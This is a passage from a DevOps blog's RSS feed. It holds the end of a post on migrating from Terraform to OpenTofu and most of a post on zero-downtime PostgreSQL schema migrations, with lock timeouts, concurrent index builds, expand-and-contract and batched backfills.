          The version-skew gotcha
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-version-skew-gotcha"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>There is one real failure mode during migration. OpenTofu tracks the Terraform state format up to the version it forked from, and forward on its own line after that. If your team upgraded Terraform past the point OpenTofu supports, <code>tofu plan</code> may fail to read the state or report a format error.</p>
<p>The fix is ordered:</p>
<ol>
<li>Downgrade Terraform to a version OpenTofu supports.</li>
<li>Run <code>terraform apply</code> once to rewrite the state in the older format.</li>
<li>Migrate to OpenTofu and run <code>tofu plan</code> to confirm a clean result.</li>
</ol>
<p>This is why you test on a staging workspace first and never run <code>tofu apply</code> blind.</p>
<h2 id="h2-migration-strategies" class="group relative scroll-mt-24">
        <a href="#h2-migration-strategies" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Migration strategies
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-migration-strategies"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Pick the rollout that matches your size and risk tolerance.</p>
<p><strong>Big bang.</strong> Replace every <code>terraform</code> reference with <code>tofu</code> in one maintenance window. This suits small teams with a handful of configurations. It is fast and there is no period of running two tools side by side.</p>
<p><strong>Parallel run (dual-engine).</strong> Keep Terraform on legacy stacks, especially anything tied to Terraform Cloud or HashiCorp-specific features, and use OpenTofu for new, greenfield work. Migrate older modules when you have a reason to touch them anyway. Large organizations use this as a hedge. It avoids a risky all-at-once cutover and lets you adopt OpenTofu features only where you are ready to commit.</p>
<h2 id="h2-should-you-switch-a-decision-framework" class="group relative scroll-mt-24">
        <a href="#h2-should-you-switch-a-decision-framework" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Should you switch? A decision framework
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-should-you-switch-a-decision-framework"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><pre><code class="hljs language-text">Do you build products or tooling on top of Terraform,
or need vendor-neutral governance?
        |
        +-- Yes --&gt; Switch to OpenTofu now.
        |
        No
        |
Do you want native state encryption, provider for_each,
or the other OpenTofu-only features?
        |
        +-- Yes --&gt; Switch to OpenTofu now.
        |
        No
        |
Do you have a large estate tied to Terraform Cloud / HCP?
        |
        +-- Yes --&gt; Dual-engine: OpenTofu for new work,
        |            Terraform for the locked-in stacks.
        |
        No
        |
Are you happy on Terraform Cloud, with no licensing concern?
        |
        +-- Yes --&gt; Staying is fine. Revisit yearly.
</code></pre><p><strong>Switch now</strong> if you build tooling on Terraform, care about open governance, or want the features Terraform&#39;s open-source CLI will not get. State encryption alone justifies it for many security-conscious teams.</p>
<p><strong>Run both</strong> if you have a large estate, especially one tied to Terraform Cloud or HCP-specific workflows. Move greenfield work to OpenTofu and migrate the rest over time.</p>
<p><strong>Stay</strong> if Terraform Cloud serves you well and the license does not touch your use case. There is no penalty for waiting, and the migration will be just as easy next year.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The OpenTofu question is settled enough to act on in 2026. The fork is in the CNCF, it ships features Terraform&#39;s open-source CLI does not have, and Terraform itself is now an IBM product on a source-available license.</p>
<p>The mental model to keep:</p>
<ul>
<li>The migration is easy and reversible. Same state format, swap the binary, plan before apply.</li>
<li>The lock-in is a later, deliberate choice. It starts when you adopt OpenTofu-only features, not when you switch.</li>
<li>Match the rollout to your estate. Big bang for small teams, dual-engine for large ones.</li>
</ul>
<p>Back up your state, test on staging, run <code>tofu plan</code>, and decide based on the features you actually want rather than the fear of the move. The move is the easy part.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Zero-Downtime Database Migrations for PostgreSQL in Production]]></title>
      <link>https://devops-daily.com/posts/zero-downtime-postgresql-migrations-production</link>
      <description><![CDATA[A single ALTER TABLE can take down a busy PostgreSQL database for minutes. This post shows why that happens and how to ship schema changes safely with lock timeouts, the expand-and-contract pattern, and copy-paste SQL recipes for indexes, columns, constraints, and type changes.]]></description>
      <pubDate>Mon, 01 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/zero-downtime-postgresql-migrations-production</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgresql]]></category><category><![CDATA[database-migrations]]></category><category><![CDATA[zero-downtime]]></category><category><![CDATA[devops]]></category><category><![CDATA[sql]]></category>
      <content:encoded><![CDATA[<p>It is 2am. A deploy goes out that adds an index to the <code>orders</code> table. The migration looks harmless:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">CREATE</span> INDEX idx_orders_customer <span class="hljs-keyword">ON</span> orders (customer_id);
</code></pre><p>Thirty seconds later the on-call phone goes off. The API is returning 500s. The connection pool is maxed out. Every request that touches <code>orders</code> is hanging. The database is up, CPU is fine, but nothing is moving.</p>
<p>What happened is that <code>CREATE INDEX</code> without <code>CONCURRENTLY</code> takes a lock that blocks every write to the table for the entire build. On a 40 million row table that build takes minutes, and during those minutes every <code>INSERT</code>, <code>UPDATE</code>, and <code>DELETE</code> on <code>orders</code> waits in line. The web workers hold their database connections while they wait, the pool drains, and now even reads that have nothing to do with <code>orders</code> cannot get a connection.</p>
<p>That is a self-inflicted outage from one line of SQL. This post is about how to never ship that line again.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A plain <code>ALTER TABLE</code> or <code>CREATE INDEX</code> takes a heavy lock. If it has to wait behind a slow query, it blocks every other query behind it too. One stuck statement stalls the whole table.</li>
<li>Always set <code>lock_timeout</code> (and <code>statement_timeout</code>) before schema changes so a migration fails fast instead of queueing and taking the table down.</li>
<li>Use <code>CREATE INDEX CONCURRENTLY</code> for indexes. It does not block writes.</li>
<li>Use the <strong>expand-and-contract</strong> pattern for anything that changes existing columns: add the new shape, backfill, switch the app, then drop the old shape in a later deploy.</li>
<li>Add constraints with <code>NOT VALID</code> first, then <code>VALIDATE CONSTRAINT</code> separately. The validation step does not block reads or writes.</li>
<li>Backfill large tables in small batches that each commit, never one giant <code>UPDATE</code>.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>PostgreSQL 12 or newer. Most of this works on 11, but a few shortcuts (like skipping a table scan when setting <code>NOT NULL</code>) need 12+.</li>
<li>A database you can connect to with <code>psql</code> and a role that can run DDL.</li>
<li>Some way to deploy application code separately from migrations. The expand-and-contract pattern needs at least two deploys.</li>
<li>A staging database with production-like row counts. Lock behavior that is instant on 1,000 rows is a 4-minute outage on 40 million.</li>
</ul>
<h2 id="h2-why-a-simple-migration-takes-down-production" class="group relative scroll-mt-24">
        <a href="#h2-why-a-simple-migration-takes-down-production" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why a "simple" migration takes down production
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-a-simple-migration-takes-down-production"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>PostgreSQL uses table-level locks for schema changes. The two that bite people most:</p>
<ul>
<li><code>CREATE INDEX</code> (without <code>CONCURRENTLY</code>) takes a <code>SHARE</code> lock. Reads still work, but every write to the table blocks until the index finishes building.</li>
<li>Most forms of <code>ALTER TABLE</code> take an <code>ACCESS EXCLUSIVE</code> lock. That blocks everything, reads included, for as long as the statement runs.</li>
</ul>
<p>For something like adding a column, the <code>ACCESS EXCLUSIVE</code> lock is held only for a moment, because on PostgreSQL 11+ adding a column with a constant default is a metadata change. So why do people still get outages from a fast <code>ALTER TABLE</code>?</p>
<p>The answer is the lock queue, and it is the part most people miss.</p>
<p>When your <code>ALTER TABLE</code> asks for an <code>ACCESS EXCLUSIVE</code> lock and some long-running <code>SELECT</code> is already holding an <code>ACCESS SHARE</code> lock on the table, your <code>ALTER TABLE</code> has to wait. That is fine on its own. The problem is that while it waits, it sits at the front of the lock queue, and every new query that needs a conflicting lock now queues behind it. A plain <code>SELECT</code> needs <code>ACCESS SHARE</code>, which conflicts with the pending <code>ACCESS EXCLUSIVE</code>, so the <code>SELECT</code> waits too.</p>
<p>So the chain is: one slow analytics query holds a read lock, your instant <code>ALTER TABLE</code> queues behind it, and then every normal query on that table queues behind your <code>ALTER TABLE</code>. The table is frozen until the slow query finishes, even though your schema change would have taken 5 milliseconds.</p>
<p>You can watch it happen. Open a second session during a migration and run:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span> pid, state, wait_event_type, <span class="hljs-keyword">left</span>(query, <span class="hljs-number">60</span>) <span class="hljs-keyword">AS</span> query
<span class="hljs-keyword">FROM</span> pg_stat_activity
<span class="hljs-keyword">WHERE</span> wait_event_type <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;Lock&#x27;</span>
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> query_start;
</code></pre><pre><code class="hljs language-text">  pid  |        state        | wait_event_type |                           query
-------+---------------------+-----------------+------------------------------------------------------------
 18442 | active              | Lock            | ALTER TABLE orders ADD COLUMN region text
 18455 | active              | Lock            | SELECT * FROM orders WHERE id = $1
 18460 | active              | Lock            | SELECT * FROM orders WHERE id = $1
 18471 | active              | Lock            | UPDATE orders SET status = $1 WHERE id = $2
</code></pre><p>Three normal queries stuck behind one <code>ALTER TABLE</code> that is itself stuck behind something else. That is your outage.</p>
<h2 id="h2-always-set-a-lock-timeout" class="group relative scroll-mt-24">
        <a href="#h2-always-set-a-lock-timeout" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Always set a lock timeout
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-always-set-a-lock-timeout"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the single highest-value habit. Before any schema change, tell PostgreSQL to give up if it cannot get the lock quickly:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">SET</span> statement_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;0&#x27;</span>;  <span class="hljs-comment">-- keep this off for long index builds</span>

<span class="hljs-keyword">ALTER TABLE</span> orders <span class="hljs-keyword">ADD</span> <span class="hljs-keyword">COLUMN</span> region text;
</code></pre><p>Now if the lock is not available within 3 seconds, the migration fails instead of queueing:</p>
<pre><code class="hljs language-text">ERROR:  canceling statement due to lock timeout
</code></pre><p>A failed migration is annoying. A frozen production table is an incident. The failed migration is the outcome you want, because it means the table kept serving traffic the entire time. You retry the migration later, ideally when no long-running query is holding the table.</p>
<p>Set this in your migration tool, not by hand. Most frameworks let you configure it. For raw SQL files, put the <code>SET lock_timeout</code> line at the top of every migration. Some teams set it in <code>postgresql.conf</code> for the migration role so it cannot be forgotten.</p>
<p>One caveat: <code>lock_timeout</code> only covers the wait to acquire the lock. A <code>CREATE INDEX CONCURRENTLY</code> that runs for 10 minutes is not affected, because it is doing work, not waiting. That is fine. The danger is the waiting, not the working.</p>
<h2 id="h2-build-indexes-concurrently" class="group relative scroll-mt-24">
        <a href="#h2-build-indexes-concurrently" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Build indexes concurrently
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-build-indexes-concurrently"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Never build an index on a live table without <code>CONCURRENTLY</code>:</p>
<pre><code class="hljs language-sql"><span class="hljs-comment">-- Wrong: blocks all writes for the whole build</span>
<span class="hljs-keyword">CREATE</span> INDEX idx_orders_customer <span class="hljs-keyword">ON</span> orders (customer_id);

<span class="hljs-comment">-- Right: writes keep working</span>
<span class="hljs-keyword">CREATE</span> INDEX CONCURRENTLY idx_orders_customer <span class="hljs-keyword">ON</span> orders (customer_id);
</code></pre><p><code>CONCURRENTLY</code> scans the table twice and takes longer, but it does not block reads or writes. The tradeoffs you need to know:</p>
<ul>
<li>It cannot run inside a transaction block. Many migration tools wrap every migration in a transaction by default. You have to turn that off for this migration (Rails has <code>disable_ddl_transaction!</code>, others have similar flags).</li>
<li>If it fails partway, it leaves an invalid index behind. This is the gotcha that surprises people.</li>
</ul>
<p>A common failure is building a unique index on data that turns out not to be unique:</p>
<pre><code class="hljs language-text">ERROR:  could not create unique index &quot;idx_users_email&quot;
DETAIL:  Key (email)=(jane@example.com) is duplicated.
</code></pre><p>The build failed, but PostgreSQL did not clean up after itself. You now have a leftover index marked invalid. Find it:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span> indexrelid::regclass <span class="hljs-keyword">AS</span> index, indrelid::regclass <span class="hljs-keyword">AS</span> <span class="hljs-keyword">table</span>
<span class="hljs-keyword">FROM</span> pg_index
<span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">NOT</span> indisvalid;
</code></pre><pre><code class="hljs language-text">        index        |  table
---------------------+---------
 idx_users_email     | users
</code></pre><p>Drop it (also concurrently, so the drop does not block writes either) and fix your data before retrying:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">DROP</span> INDEX CONCURRENTLY idx_users_email;
</code></pre><h2 id="h2-the-expand-and-contract-pattern" class="group relative scroll-mt-24">
        <a href="#h2-the-expand-and-contract-pattern" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The expand-and-contract pattern
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-expand-and-contract-pattern"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Indexes are the easy case. The hard case is changing a column that the application already reads and writes. Renaming a column, changing its type, making it <code>NOT NULL</code>, or splitting it into two columns all break the running application the instant the schema changes, because the old code still expects the old shape.</p>
<p>The fix is to never change a column in place while code depends on it. You split the change across multiple deploys. This is the expand-and-contract pattern, sometimes called parallel change.</p>
<pre><code class="hljs language-text">  Deploy 1: EXPAND     Deploy 2: MIGRATE      Deploy 3: CONTRACT
  add new shape        backfill + dual-write   drop old shape
  (additive only)      switch reads to new     (additive removal)

  old col ───────────────────────────────────────► dropped
  new col      ◄──── added ───────► written ──────► sole source
</code></pre><p>The rule that makes it safe: every individual deploy is backward compatible with the code that is still running. At no point does new schema require new code or new code require new schema.</p>
<p>Say you want to rename <code>users.name</code> to <code>users.full_name</code>. A plain <code>ALTER TABLE ... RENAME COLUMN</code> breaks every running instance of the old code that still selects <code>name</code>. Do this instead:</p>
<p><strong>Deploy 1 (expand).</strong> Add the new column. Nothing reads it yet.</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">ADD</span> <span class="hljs-keyword">COLUMN</span> full_name text;
</code></pre><p>Update the application to write to both columns on every insert and update. Reads still come from <code>name</code>.</p>
<p><strong>Deploy 2 (migrate).</strong> Backfill the existing rows (see the batching section below), then switch reads to <code>full_name</code>. Now both columns are kept in sync and the app reads the new one.</p>
<p><strong>Deploy 3 (contract).</strong> Once you are sure no running code reads <code>name</code>, drop it:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">DROP</span> <span class="hljs-keyword">COLUMN</span> name;
</code></pre><p>Three deploys to rename a column feels like a lot. It is also the difference between a routine change and a customer-facing outage. The same pattern handles type changes (add <code>id_bigint</code>, backfill, swap), splitting columns, and moving data between tables.</p>
<h2 id="h2-adding-a-not-null-column-safely" class="group relative scroll-mt-24">
        <a href="#h2-adding-a-not-null-column-safely" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Adding a NOT NULL column safely
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-adding-a-not-null-column-safely"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Adding a nullable column is cheap. Making a column <code>NOT NULL</code> is where people get caught, because a naive <code>SET NOT NULL</code> scans the whole table under an <code>ACCESS EXCLUSIVE</code> lock.</p>
<p>Do it in steps. First add the column nullable and backfill it. Then add a <code>CHECK</code> constraint as <code>NOT VALID</code>, which is instant because it only applies to new rows:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">ADD</span> <span class="hljs-keyword">COLUMN</span> email_verified <span class="hljs-type">boolean</span>;

<span class="hljs-comment">-- backfill here (see next section), then:</span>

<span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">ALTER TABLE</span> users
  <span class="hljs-keyword">ADD CONSTRAINT</span> users_email_verified_not_null
  <span class="hljs-keyword">CHECK</span> (email_verified <span class="hljs-keyword">IS</span> <span class="hljs-keyword">NOT NULL</span>) <span class="hljs-keyword">NOT</span> VALID;
</code></pre><p>Now validate it in a separate statement. <code>VALIDATE CONSTRAINT</code> scans the table, but it takes only a <code>SHARE UPDATE EXCLUSIVE</code> lock, which allows reads and writes to continue:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> users VALIDATE <span class="hljs-keyword">CONSTRAINT</span> users_email_verified_not_null;
</code></pre><p>On PostgreSQL 12+ you can then promote it to a real <code>NOT NULL</code> and PostgreSQL skips the table scan, because the validated <code>CHECK</code> already proves no nulls exist:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">ALTER</span> <span class="hljs-keyword">COLUMN</span> email_verified <span class="hljs-keyword">SET</span> <span class="hljs-keyword">NOT NULL</span>;
<span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">DROP</span> <span class="hljs-keyword">CONSTRAINT</span> users_email_verified_not_null;
</code></pre><p>The same <code>NOT VALID</code> then <code>VALIDATE</code> trick works for foreign keys. Adding a foreign key normally locks both tables while it checks every existing row. Split it:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> orders
  <span class="hljs-keyword">ADD CONSTRAINT</span> orders_customer_fk
  <span class="hljs-keyword">FOREIGN KEY</span> (customer_id) <span class="hljs-keyword">REFERENCES</span> customers (id) <span class="hljs-keyword">NOT</span> VALID;

<span class="hljs-keyword">ALTER TABLE</span> orders VALIDATE <span class="hljs-keyword">CONSTRAINT</span> orders_customer_fk;
</code></pre><h2 id="h2-backfill-in-small-committing-batches" class="group relative scroll-mt-24">
        <a href="#h2-backfill-in-small-committing-batches" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Backfill in small, committing batches
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-backfill-in-small-committing-batches"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>When you backfill a column on a large table, do not run one big <code>UPDATE</code>. A single <code>UPDATE users SET email_verified = false WHERE email_verified IS NULL</code> on 40 million rows holds locks for the whole run, builds a huge transaction, and bloats the table with dead rows that vacuum has to clean up later.</p>
<p>Batch it. Each batch updates a few thousand rows and commits, so transactions stay short and other queries keep moving. A stored procedure with <code>COMMIT</code> inside the loop (PostgreSQL 11+) is the cleanest copy-paste version:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">PROCEDURE</span> backfill_email_verified()
<span class="hljs-keyword">LANGUAGE</span> plpgsql <span class="hljs-keyword">AS</span> $$
<span class="hljs-keyword">DECLARE</span>
  affected <span class="hljs-type">integer</span>;
<span class="hljs-keyword">BEGIN</span>
  LOOP
    <span class="hljs-keyword">UPDATE</span> users
    <span class="hljs-keyword">SET</span> email_verified <span class="hljs-operator">=</span> <span class="hljs-literal">false</span>
    <span class="hljs-keyword">WHERE</span> id <span class="hljs-keyword">IN</span> (
      <span class="hljs-keyword">SELECT</span> id <span class="hljs-keyword">FROM</span> users
      <span class="hljs-keyword">WHERE</span> email_verified <span class="hljs-keyword">IS</span> <span class="hljs-keyword">NULL</span>
      LIMIT <span class="hljs-number">5000</span>
    );
    <span class="hljs-keyword">GET</span> DIAGNOSTICS affected <span class="hljs-operator">=</span> ROW_COUNT;
    EXIT <span class="hljs-keyword">WHEN</span> affected <span class="hljs-operator">=</span> <span class="hljs-number">0</span>;  <span class="hljs-comment">-- nothing left to update</span>
    <span class="hljs-keyword">COMMIT</span>;                  <span class="hljs-comment">-- commit each batch, release locks</span>
  <span class="hljs-keyword">END</span> LOOP;
<span class="hljs-keyword">END</span>;
$$;

<span class="hljs-keyword">CALL</span> backfill_email_verified();
</code></pre><p>If the backfill is putting too much load on the database, add a small <code>PERFORM pg_sleep(0.1)</code> before the <code>COMMIT</code> to slow it down. Five thousand rows per batch is a reasonable starting point. Tune it based on row size and how much replication lag you can tolerate, because every batch ships to your replicas too.</p>
<p>When the backfill finishes, drop the procedure:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">DROP</span> <span class="hljs-keyword">PROCEDURE</span> backfill_email_verified;
</code></pre><h2 id="h2-a-migration-checklist-before-you-ship" class="group relative scroll-mt-24">
        <a href="#h2-a-migration-checklist-before-you-ship" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          A migration checklist before you ship
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
